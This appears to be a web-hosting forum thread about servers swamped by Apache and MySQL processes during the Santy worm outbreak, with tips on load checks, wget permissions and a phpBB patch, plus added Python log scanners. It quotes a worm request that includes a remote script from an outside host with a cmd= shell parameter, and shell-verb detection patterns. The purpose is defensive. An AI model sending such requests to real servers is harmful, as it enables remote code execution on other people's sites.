Am I being Hacked (DDOSED)!!

Aziz

Well, it just started two days ago that my MySQL is starting to have too many connections, and when I open my control panel I see a whole bunch of PIDs running (which I have to stop/start to get it working again)... also Apache is the same..

I think I am being DDOS attacked?

What do you think?

Peace,
 
Aziz said:
Well, it just started two days ago that my MySQL is starting to have too many connections, and when I open my control panel I see a whole bunch of PIDs running (which I have to stop/start to get it working again)... also Apache is the same..

I think I am being DDOS attacked?

What do you think?

Peace,
Can you give more info?
How many MySQL PIDs? 100? 200? 300?
What sites do you have online?
How many databases?
Do you have any BW tool so you can see the real BW usage of the server?
How is the CPU load?
What OS do you use?
What are the specs of the server?

Please provide more details (as many as you can) so I can give you a better answer.
 
blueice said:
Can you give more info?
How many MySQL PIDs? 100? 200? 300?

I would say around 100... but they always seem to increase and never decrease?!
Although this started two days ago (after an argument between me and some members on some web hosting forum)..

blueice said:

What sites do you have online?

Well, many: free-php-scripts.net, sonimager.com and goldmohamed.com are the ones that use databases a lot... but there has been absolutely no change to these sites in the last month.

blueice said:

How many databases?

Around 10... but only around 3-4 that are really active... Again, no change in the last month or so..

blueice said:

Do you have any BW tool so you can see the real BW usage of the server?

BW usage is 6.5 GB since the beginning of the month (normal).

blueice said:

How is the CPU load?

I do not know how to get that, but space is steady at 1.1 GB.

blueice said:

What OS do you use?

Fedora Project.

blueice said:

What are the specs of the server?

Intel 1.7 GHz CPU
512 MB RAM
80 GB HD
1000 GB Data Transfer


I would appreciate any help...

Apache Log File: (3.3 MB)
http://www.azizsaleh.com/log.txt

Thanks for any help,

Peace,
 
Hi Aziz,

We talked on WHT before :) Anyway, to get the CPU load, you can log in over SSH and issue this:

uptime

That should show something like this:
04:52:07 up 237 days, 15:18, 1 user, load average: 0.14, 0.43, 0.37

The three numbers represent the load on the system, averaged over three different periods of time. For your specs, I would think a load of 2.0 would be the maximum that is no problem.

Anything below 1.0 should be considered very good. The lower it is, obviously the better it is.

Do you have a firewall installed? Is it running? Are you giving your users SSH access? Can you post the results of

top
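The load-average check the reply above describes, as an added example that is not part of the thread: it parses an `uptime` line, judges the one-minute load per CPU (the 1.0 and 2.0 figures are the reply's own, scaled by CPU count), flags a load that is still climbing, and counts httpd/mysqld processes from `ps` output. The sample uptime line is the one quoted in the reply; the `ps` output in the test is constructed.

```python
# Added example (not from the thread): read the load averages the reply above
# explains, judge them per CPU, and count httpd/mysqld processes. The sample
# uptime line is the one quoted in the reply; the ps output is constructed.
import re
import subprocess

# matches both Linux "load average: a, b, c" and BSD "load averages: a b c"
LOAD_RE = re.compile(r"load averages?:\s*([\d.]+),?\s+([\d.]+),?\s+([\d.]+)")


def parse_load(uptime_line):
    """Return the (1, 5, 15 minute) load averages from an `uptime` line."""
    m = LOAD_RE.search(uptime_line)
    if m is None:
        raise ValueError("no load average in: %r" % uptime_line)
    return tuple(float(x) for x in m.groups())


def load_verdict(uptime_line, cpus=1, warn_per_cpu=1.0, crit_per_cpu=2.0):
    """Classify the 1-minute load relative to the CPU count.

    Load is a run-queue length, so it scales with CPUs: the 1.0 / 2.0 figures
    the reply gives for a single 1.7 GHz CPU become 4.0 / 8.0 on four cores.
    """
    one_min = parse_load(uptime_line)[0] / cpus
    if one_min >= crit_per_cpu:
        return "critical"
    if one_min >= warn_per_cpu:
        return "warning"
    return "ok"


def load_trend(uptime_line):
    """'rising' when 1min > 5min > 15min (the "never decreases" pattern from
    the thread), 'falling' when the reverse holds, otherwise 'flat'."""
    one, five, fifteen = parse_load(uptime_line)
    if one > five > fifteen:
        return "rising"
    if one < five < fifteen:
        return "falling"
    return "flat"


def count_processes(ps_output, names=("httpd", "mysqld")):
    """Count processes by command name from `ps -eo comm=` output."""
    counts = {name: 0 for name in names}
    for line in ps_output.splitlines():
        comm = line.strip()
        if comm in counts:
            counts[comm] += 1
    return counts


def live_counts(names=("httpd", "mysqld")):
    """Same count against the local machine (needs a procps-style `ps`)."""
    out = subprocess.run(["ps", "-eo", "comm="], capture_output=True,
                         text=True, check=False).stdout
    return count_processes(out, names)


if __name__ == "__main__":
    sample = "04:52:07 up 237 days, 15:18, 1 user, load average: 0.14, 0.43, 0.37"
    print(parse_load(sample), load_verdict(sample), load_trend(sample))
    print(live_counts())
```

A one-minute figure well above the five- and fifteen-minute ones is the shape to look for when processes pile up until a restart, as described earlier in the thread; `count_processes` gives the PID count the first reply asked for without eyeballing `top`.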
 
The same is happening to me. Too many pids for both Apache and MySQL. I get errors on sites running PHP and MySQL, from too many connections (when there are only a couple), and when trying to log into squirrelmail, I get
Fatal error: session_start(): Failed to initialize storage module: user (path: /tmp) in /var/www/html/squirrelmail-1.4.2/functions/global.php on line 295

All sites running PHP and MySQL are extremely slow!

I've tried a reboot, but it doesn't solve the problem.

Could it be the security vulnerability in PHP? I haven't patched mine yet...
 
Apache and MySQL have around 80 pids running each.

What can I do to solve this?
 
Oddly, we seem to be getting this on our server too. Has someone made a new server hack?

It appears to have started around midnight on Saturday morning. Over time the load and traffic get higher and higher and higher until we reboot the server. It's quiet for a while, but then starts again.

Rowan.
 
Being on vacation doesn't stop DA... they released the fix for the PHP vulnerabilities long before the Christmas holiday. It's explained in the other thread.
 
Anyone know how to stop the Santy worm from trying to execute the following on my PHP scripts:
/index.php?cPath=http://www.visualcoders.net/spy.gif?&cmd=cd%20/
?

This is just an example of what is happening. It distorts the PHP sessions.
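A log check for the request shape quoted above, as an added example that is not part of the thread: it parses Apache common/combined log lines, flags query parameters whose value is a remote URL (the `cPath=http://...` pattern) or that carry shell commands (the `cmd=` parameter), and counts requests per address, which is the check for the "am I being DDoSed" question earlier in the thread. The log lines are constructed; the first reuses the request from the post.

```python
# Added example (not from the thread): scan Apache access-log lines for the
# request shape quoted in the post above (a URL passed as a parameter value,
# plus a cmd= parameter) and for single addresses hammering the server.
# The log lines are constructed; the first reuses the request from the post.
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Common/combined log format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
# a few shell verbs at the start of, or chained into, a parameter value
SHELL_HINT = re.compile(r'(?:^|;|&&|\|)\s*(?:cd|wget|curl|lynx|fetch|perl|chmod|rm)\b')


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Return a list of (finding, parameter) for one request path."""
    findings = []
    # parse_qsl url-decodes values, so %20 is already a space here
    for key, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            findings.append(("remote_include", key))
        if key.lower() == "cmd" or SHELL_HINT.search(value):
            findings.append(("command", key))
    return findings


def scan(lines, flood_threshold=50):
    """Return (suspicious requests, addresses at or over the request threshold)."""
    suspicious, per_ip = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_ip[rec["ip"]] += 1
        hits = classify(rec["path"])
        if hits:
            suspicious.append((rec["ip"], rec["path"], hits))
    flooders = [ip for ip, n in per_ip.items() if n >= flood_threshold]
    return suspicious, flooders


SAMPLE_LOG = [  # constructed for this example
    '10.0.0.7 - - [26/Dec/2004:03:12:45 +0000] "GET /index.php?cPath=http://www.visualcoders.net/spy.gif?&cmd=cd%20/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [26/Dec/2004:03:12:46 +0000] "GET /index.php?cPath=22 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [26/Dec/2004:03:12:47 +0000] "GET /viewtopic.php?t=1&highlight=test HTTP/1.0" 200 4000 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [26/Dec/2004:03:12:48 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    bad, flooders = scan(SAMPLE_LOG, flood_threshold=2)
    for ip, path, hits in bad:
        print(ip, path, hits)
    print("over threshold:", flooders)
```

Run it against a real log with `scan(open("/var/log/httpd/access_log"))` and a threshold that fits the site's normal traffic; the addresses it returns are the ones to look at in the firewall, and the flagged requests show which script the scanner is aiming at.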
 
Change the perms on wget to 700. Then go clean up the mess. It took me about an hour to kick the script kiddies off a server.

Also, if you are running a redhat derivative, seriously look at running Bastille on it. (search freshmeat.net)

HTH,

=C=
 
Thanks! Wget will be chmod 700. Don't need it for anything else than for root.

Apparently I could add
PHP:
'php_value session.save_handler "files"'
to my config file, and it should solve some of the problem. Anyone know which config file?
 
Apparently I could add
PHP:
'php_value session.save_handler "files"'
to my config file, and it should solve some of the problem. Anyone know which config file?

Well, that looks like something you would add to httpd.conf to configure PHP. Two things though:

1) I'd modify php.ini directly if I were you. The only time I add php_value to an apache config file is when I'm changing something for a specific customer.

2) I really don't see how that's going to help much. That's the default value. grep /usr/local/lib/php.ini for save_handler. It should already say files unless you've implemented a custom session handler.

HTH,
=C=
 
Just a tip here: same type of problems here, Apache processes out of control till the server dies of heavy load, all coming from older phpBB boards. Upgrade your boards to 2.0.11 as a quick fix to buy some time; this might help:

Open viewtopic.php in any text editor. Find the following section of code:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

for($i = 0; $i < sizeof($words); $i++)
{

and replace with:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

for($i = 0; $i < sizeof($words); $i++)
{
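The only difference between the two viewtopic.php snippets above is the removed `urldecode()` call. PHP has already decoded the query string once when it fills `$HTTP_GET_VARS`, so the old code decoded the `highlight` parameter twice. The added example below is not part of the thread and is written in Python rather than PHP; it simulates both versions on a doubly-encoded value to show what the extra decode lets through. The `htmlspecialchars` helper mirrors the PHP 4 default (it escapes `& " < >` but not the single quote).

```python
# Added example (not from the thread, and written in Python rather than PHP):
# the only difference between the two viewtopic.php snippets above is the
# urldecode() call. PHP has already decoded the query string once when it fills
# $HTTP_GET_VARS, so the old code decoded twice. Simulating both versions on a
# doubly-encoded 'highlight' value shows what the extra decode lets through.
from urllib.parse import unquote


def htmlspecialchars(s):
    """PHP 4 htmlspecialchars() default: escape & " < > but not the single quote."""
    return (s.replace("&", "&amp;").replace('"', "&quot;")
             .replace("<", "&lt;").replace(">", "&gt;"))


def php_get_var(raw_query_value):
    """What PHP puts in $HTTP_GET_VARS['highlight']: one url-decode of the raw value."""
    return unquote(raw_query_value)


def old_highlight_words(raw_query_value):
    """Pre-2.0.11: explode(' ', trim(htmlspecialchars(urldecode($highlight))))"""
    value = unquote(php_get_var(raw_query_value))  # the second decode
    return htmlspecialchars(value).strip().split(" ")


def new_highlight_words(raw_query_value):
    """2.0.11 fix: explode(' ', trim(htmlspecialchars($highlight)))"""
    return htmlspecialchars(php_get_var(raw_query_value)).strip().split(" ")


if __name__ == "__main__":
    # "%2527" is a percent-encoded "%27", i.e. a single quote encoded twice
    for raw in ("word", "%2527", "foo%2520bar", "a%3Cb"):
        print(raw, old_highlight_words(raw), new_highlight_words(raw))
```

With the old code, `%2527` comes out as a bare single quote, which `htmlspecialchars()` in its default mode never escapes, and `%2520` becomes a space that splits an extra word; the fixed version hands both through as the inert literals `%27` and `%20`. Characters that `htmlspecialchars()` does cover, such as `<`, are escaped either way, which is why the double decode matters only for what that function leaves alone.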
 